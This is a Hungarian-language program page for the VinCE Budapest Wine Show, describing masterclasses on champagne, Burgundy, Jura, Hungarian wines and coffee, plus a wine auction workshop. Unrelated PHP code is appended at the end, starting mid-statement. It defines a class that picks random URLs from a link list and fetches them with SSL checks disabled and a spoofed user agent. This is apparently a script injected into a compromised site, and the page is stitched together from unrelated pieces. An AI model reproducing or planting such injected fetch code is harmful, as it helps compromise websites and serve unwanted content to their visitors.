Programok részletesen


A programok leírását folyamatosan bővítjük. Érdemes gyakran visszatérni, mivel minden nap ajánlunk egy-egy újabb programot!

1014092_756559127687626_1374961149_nCEWI Presents the Hungarian Wine Excellences Workshop
Magyarország legdinamikusabban fejlődő boriskolája a CEWI (Central European Wine Institute) idén a Magyar Borkiválósági Program legjobb, legizgalmasabb és legsikeresebb tételeit mutatja be. Magyarország legmagasabbra értékelt borkiválóságainak bemutatásán túl Horkay András szakmai vezetésével bepillantást nyerhetünk a Nagy Országkóstoló kulisszatitkaiba. Megismerkedhetünk a program céljával, az értékelés szempontjaival. Ezúttal mi is 90 percre bírákká válhatunk, és megtudhatjuk, hogy vajon a véleményünk egyezik e a bírák választásával. Aki ellátogat erre az előadásra, az ajándékba kapja a Fehér Borkiválóságok könyvét is.
Március 1, Szombat, 13.30, Orfeum Club >>

 

veuve_clicquot_magnum-500x500Tom Stevenson Exclusive Masterclass – „A Magnum Hatás”
Előadó: Márkus György
Kedves Vendégeink,
Sajnálattal szeretnénk Önökkel tudatni, hogy a VinCE Budapest Wine Show szombati Tom Stevenson Exclusive Masterclass előadója, Tom Stevenson betegség miatt lemondta a VinCE Budapesten való szereplését. Távollétében az előadást Márkus György Tom Stevenson leghűségesebb tanítványa tartja meg, azonban, ha Önöknek ez nem megfelelő, kérjük jelezzék és visszautaljuk a jegy árát, vagy beválthatják másik előadásra. Reméljük mindez nem szegi kedvüket a VinCE Budapesten való részvételtől. Elnézésüket kérjük a kellemetlenségért.
Palack, magnum, jeroboam …. és még lehetne tovább sorolni az egyre  nagyobb térfogatú pezsgős és boros palackokat, melyeknek ma már se szeri, se száma. Miért van mindezekre szükség? Nem elég nekünk a palack? Talán az óriási tároló edények pusztán kényelmi szempontnak számítanak, amik csak annyiban különböznek a palacktól, hogy jóval több champagne fér beléjük? Annál jobb a pezsgő, minél nagyobb a palack, vagy van a minőségnek felső határa? A kérdésre a hallgatóság Márkus Györgytől és a Veuve Clicquot „Sárga Címkés”-ének különböző évjáratokon alapuló palackjaitól és magnumjaitól kapja meg a választ a szombat délutáni exkluzív mesterkurzuson.
Március 1, Szombat, 17.30, Orfeum Club >>

Alfred Gratien Champagne Masterclass
Előadó: Nicolas Jaeger
alfred_gratien“Mindig is úgy gondoltam, hogy a champagne az a borok világában, ami az haute couture a divat világában” – mondta Alfred Gratien, és legtöbbünk egyetért vele, amint egy pohár mennyei champagne kerül a  poharunkba. Az Alfred Gratien pezsgőház azon kevesek közé tartozik Champagne-ban, akik még mindig hordóban érlelik az alapbort. A VinCE Magazin pezsgőtesztjén a  pezsgőház olyan bravúrt ért el, amit korábban eddig egy pincészet sem: tesztünkön három (!) ötcsillagos, azaz VinCE-díjas értékelést szereztek, úgy, hogy ezzel az Alfred Gratien pezsgők voltak az egyedüli ötcsillagosok. Igazi mesterhármas! A csúcspezsgők mellett mesterkurzusunkon megkóstolhatunk valami igazán különlegeset is: az alapbort, minden pezsgőjük eredőjét. A nem mindennapi kóstolót maga a pezsgőmester (Chef du Cave, azaz szó szerint pincemester), Nicolas Jaeger celebrálja.
Március 2, Vasárnap, 9.30, Mesterkurzus terem >>

Interaktív házasítás mesterfokon, avagy borvidékek házassága
Előadók: Zwack Izabella, Domokos Attila, Légli Géza, Rókusfalvy Pál
MGB_3135.jpgKíváncsi, hogyan zajlik a házasítás a gyakorlatban? Miért jó, mire figyeljünk, hogy jól sikerüljön a borok házassága?  Három borvidék, három borász, három fehérborát fogjuk kóstolni és házasítani, a hallgatóságból csapatokat alkotva közösen dolgozunk, mindenki kipróbálhatja a pincemunkát! A legjobb cuvée-t bemutatjuk a külföldi borszakértőknek a péntek esti díszvacsorán, sőt a legjobb csapat minden tagja hozzájuthat egy-egy egyedi címkével ellátott, általa készített borhoz.

Február 28, Péntek, 13.30, Workshop terem >>


COFFEE PASSION MASTERCLASS  – Egy csésze terroir
Előadó: André Hoinkis, a Douwe Egberts nemzetközi kávészakértője
andre-hoinkisAndré Hoinkis nemzetközi kávészakértővel a single origin kávék világába pillanthatunk be, távoli kávétermő régiókat ismerhetünk meg és azt is megtudhatjuk, hogyan érvényesülnek a borvilágból már ismert egyedi terroirjegyek a kávéknál. A két egzotikus Omnia Reserve termőhely; a kolumbiai Huila régió és az indiai Malabar part kávéi mellett vietnámi és különleges etióp kávékat kóstolhat a közönség – méghozzá borospohárból! A poharakba természetesen egy-egy szekszárdi és etyeki bor is a kerül majd a Dúzsi Tamás Pincészetéből és a Hernyák birtokról, hogy ezeken keresztül is bemutathassuk a kávé- és borkultúra találkozási pontjait.

Egzotikus kávékhoz egzotikus borok! A mesterkurzus meghívott vendége az Újdelhiből érkező BorVilág – VinCE Ösztöndíjas Deepak Shettigar. A közönség két eddig itthon még nem ismert bort kóstolhat a sommelier bajnok közreműködésével; egy fűszeres shirazt az indiai „álmok völgyéből” és Brazíliából egy házasítást, amelyet a nyári FIFA Labdarúgó Világbajnokság hivatalos borának választottak.
Február 28, Péntek, 13.30, Mesterkurzus terem >>

Russia’s Abrau Durso Mesterkurzus – A valódi orosz pezsgő egy francia borász kezében
Előadó: Fabian Lorenzon, Franciaország és Nuno Terrao, Portugália
IMG_3944-2Van egy pincészet a messzi Krasnodarban, amelynek történelme során cárokról, hercegekről és előkelő uraságokról szól, miközben a pompa és csillogás csak néha-néha kapott helyet az életében. Azonban az előkelőség, a história és a végtelen energia, amelyet 140 év alatt a pincészetbe fektettek ott hever majd előttünk a VinCE Budapest Wine Show-n, hiszen február 28-án itthon debütál az Abrau-Durso pezsgőpincészet.
Február 28, Péntek 15.30, Mesterkurzus terem >>

Moët & Chandon Masterclass– Roger Federer kedvence
Előadó: Elise Losfelt
ROGER-FEDERER-THE-NEW-MOET-CHANDON-BRAND-AMBASSADORA lendületes és sármos teniszcsillag előtt a szépséges Scarlett Johannson volt a világ legnagyobb mennyiségben eladott champagne-ának arca – a férfiak nagy örömére. Idén a technikás teniszező képviseli a márkát, a megnyerő bajnokkal pedig könnyen azonosulunk.
Az előadást maga a csinos borászhölgy, Elise Losfelt tartja, így bepillantást nyerhetünk a pezsgők legféltetettebb titkába, az alapborok készítésébe.
Kevesen tudják, hogy a Dom Perignon csúcspezsgő ugyancsak a Moët & Chandon pezsgőházhoz tartozik! A kurzuson természetesen a pezsgők királyát is megkóstolhatjuk!
Március 1, Szombat, 9.30, Mesterkurzus terem >>

Austria’s Prager Workshop avagy Mr. Terroir borai
E
lőadó: Toni Bodenstein
Weingut Prager
Köszönhetően a minőségben megalkuvást nem ismerő Prager-Bodenstein családnak, az 1715-ben alapított a Weingut Prager az elmúlt évtizedekben a borvidék egyik legmeghatározóbb szereplője lett. 1983-ban Franz Prager indította el a borvidéket megreformáló Vinea Wachau mozgalmat, melynek vezetését a kilencvenes évek végén lánya, Ilse Prager és férje Toni Bodenstein vette át. Bodenstein vezetése alatt a pincészet a borvidék egyik legelismertebb terroir ismerőjévé és közvetítőjévé vált. A geológus, biológus, történész, majd borász végzettséggel is rendelkező Toni Bodenstein páratlan kutatást végzett a borvidéken, a történelmi tapasztalatok, friss talajtani elemzések, szőlészeti kísérletek eredményeként nagy mértékben átértékelte a dűlőkről alkotott elképzeléseket. Talán nem véletlen, hogy Bodenstein-t ma sokan Mr.Terroir-ként emlegetik.
Március 1, Szombat, 13.30, Workhop terem >>

Burgundy  Clive Coates Masterclass
Előadó: Clive Coates MW
Clive CoatesMagyarország legnagyobb Burgundia-szakértője, Márkus György mondja: “egy barátom kezembe nyomta Clive Coates Cote d’Or című könyvét. Gyorsan átrágtam magam rajta, majd még egyszer, és még egyszer. Végül vettem magamnak egy példányt belőle. Tulajdonképpen ez a könyv változtatta meg az életemet.” Ez a legendás alak jön most Magyarországra! Ő az, aki méltó ehhez a mitikus, megfejthetetlen borvidékhez, amelyik a világ legdrágább borait adja.
Természetesen vendégeink meg is kóstolják a “titkot” 3 fehér- és 3 vörösbor segítségével.
Március 1, Szombat, 15.30, Mesterkurzus terem >>

Mór – Humour Workshop
Előadó: A móri borvidék borászai
mor1A tavalyi nagysikerű Wine Kids előadás után újra itt egy könnyed, laza, fiatalos, humoros előadás, ahol 5 móri borász mutatja be szerinte legjobb 2013-as tételét és egy általa választott kedvenc évjáratot. Mindehhez a kötetlen hangvételű kóstolóhoz segítségül hívjuk Benk Dénest a Dumaszínház egyik oszlopos tagját is! Csetvei Kriszti, Miklós Csabi, a Maurus Pince új ifjú borásza, Mórocz Tamás, Varga Máté és Bozóky Péter borait lehet majd kóstolni.
Március 1, Szombat, 15.30, Orfeum Club >>

Hungary’s Top Whites Workshop és Hungary’s Top Reds Workshop
Előadó: Dr. Mészáros Gabriella
Nagy fehérek a Pannon Bormívesektől, illetve Nagy vörösek a Pannon Bormívesektől Dr. Mészáros Gabriella
A Pannon Bormíves Céh tagjai az ország szinte valamennyi számottevő borvidékét képviselik. Összeköti őket a családi birtok, az elkötelezettség a pannon föld, a szőlő és elsősorban a bor minősége és egyedisége iránt. Megalakulásuk óta már a második évtized napjait számláljuk és így sokak örömére az utódok is ott állnak a szőlőtőkék és palackok mögött.
A VinCE Budapest alkalmával sorra kerülő két kóstoló átfogó képet ad a táj és a termőföld változatosságáról, de mondhatjuk azt is: hű lenyomata az elmúlt húsz évnek. Lehetőségek, rengeteg munka, kitartás és a végeredmény: megismételhetetlen, feledhetetlen alkotások.
Dr. Mészáros Gabriella – nemzetközi borakadémikus, szakíró, a Borkollégium oktatója. Számos könyv szerzője, szerkesztője, kiadója.
Március 1, Szombat, 11.30, illetve 17.30, Workshop terem >>

France’s Jura Workshop
Előadó: Wink Lorch
JuraJura Franciaország legkisebb borvidéke, borai mégis elképesztő változatosságot mutatnak a pezsgőktől kezdve a könnyű vörösborokon át a szokatlan fehérborokig és az igazi különlegességig, a hosszan érlelt ‘vin jaune’-ig, ami magyarul annyit tesz: ‘sárga bor’.  Wink segít a hallgatóságnak kibogozni a bonyolult régió sajátosságait, elmagyarázza az eredetvédett területeket, bemutatja a szőlőfajtákat és a borkészítési módokat. Az előadásában felbukkannak részletek készülő könyvéből, amelyet teljes egészében Jurának szentel – térképekkel és fotókkal illusztrálva. A nyolc bor közt, amelyet Wink erre a kóstolóra választott, lesz pezsgő, két vörösbor, négy fehérbor és egy vin jaune. Öt borász keze munkáját kóstolhatjuk, így Wink egyaránt megoszthatja velünk történeit borokról és emberekről.
Március 2, Vasárnap, 13.30, Workshop terem >>

 ’Urban Legends Workshop
Előadó: Kristian Kielmayer
McGuigan-City-Vineyard-9Amikor a „borvidék” szót meghalljuk, milyen kép jelenik meg lelki szemeink előtt? Egy érintetlen, dimbes-dombos, nyugodt, csendes vidék képe, ahol az emberek nem sietnek sehová és ahová világunk zaja sem tört még be? Azt gondolom, hogy valóban sokunkban ez a kép él a szó hallatán.
Köztudott ugyanakkor, hogy számos főváros nevezetes igencsak komoly szőlőtermesztéséről és borászatáról, mely a főváros határain belül és mentén folyik, ahol az urbanizáció sem tudta kiszorítani a szőlő és a bor adta imént felidézett szépségeket. A workshop alkalmával világunk ilyen fővárosaiba kalandozunk el, ahol a szőlő és a bor találkozik a nagyvárosi (fővárosi) élettel. Tartsanak velem erre a kirándulásra…
Március 2., Vasárnap, 9.30, Workshop terem >>

Kazinczy Auction Workshop
Előadó: Kazinczi Zsuzsanna 
“Kiváló borok kiváló embereknek! Ízleljük meg elérhető áron a befektetést.”
Chateau Ausone, Saint-Emilion Grand Cru 1986&85&75 - száraz – 0,75 LA Kazinczy Boraukció azzal a céllal jött létre, hogy Magyarországon új fajta, külföldön jól működő piaci teret alkosson a kereskedelmi forgalomban nem kapható magyar és külföldi tételek számára.
Mindenki számára elérhetővé téve azokat a borokat, amikről az utóbbi évtizedekben hallhatott, láthatott, vagy már ízlelhetett is. A bor aukciósház kifejezetten a “Fine Wine” vonalat képviseli, ami a magyar felső kategóriával, a külföldi 90 pont fölötti borokkal és érdekességeivel foglalkozik.
A közeljövőben indítja el az online borboltjukat, ahol a borkülönlegességek lesznek megvásárolhatóak. Az élő boraukcióra tartogatják azokat a ritkaságokat, amikkel egy személyre szóló élményt szereznek minden vendég számára.
A Vince Budapest keretein belül nagyjából 150 magyar és 150 francia borritkaságot tárnak a közönség elé, kiegészítve néhány igazán érdekes párlattal.
Elérhetőségek: www.boraukcio.comaukcio@boraukcio.com. A kikiáltási tételek listája február 15-étől érhető el a honlapon, vagy kérhető emailben.
Március 2., Vasárnap, 15.30, Workshop terem >>

 


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>